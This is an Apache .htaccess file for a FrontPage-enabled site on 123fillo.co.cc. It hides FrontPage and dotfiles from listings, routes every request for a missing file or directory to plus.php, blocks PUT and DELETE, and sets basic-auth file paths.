# -FrontPage-
IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*
DirectoryIndex plus.php index.php index.htm index.html
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . plus.php [L]
<Limit GET POST>
order deny,allow
deny from all
allow from all
</Limit>
<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>
AuthName 123fillo.co.cc
AuthUserFile /home/fillo01/public_html/_vti_pvt/service.pwd
AuthGroupFile /home/fillo01/public_html/_vti_pvt/service.grp